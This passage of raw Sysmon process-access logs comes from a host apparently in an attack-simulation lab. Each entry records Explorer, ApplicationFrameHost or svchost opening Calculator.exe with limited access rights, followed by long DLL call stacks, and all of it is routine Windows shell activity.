Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360689Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360688Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360687Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360686Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360685Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360684Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360683Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360682Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.374{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360681Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.374{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360680Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.374{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360679Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.374{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360678Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.374{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360677Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.374{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360676Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.374{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+78dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000360675Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.374{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6cfd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000360674Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.358{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360673Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.358{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360672Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.358{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6c97|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6bab|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000360671Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.358{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6b1a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000360670Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.358{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360669Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.358{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360668Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.358{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360667Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.358{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 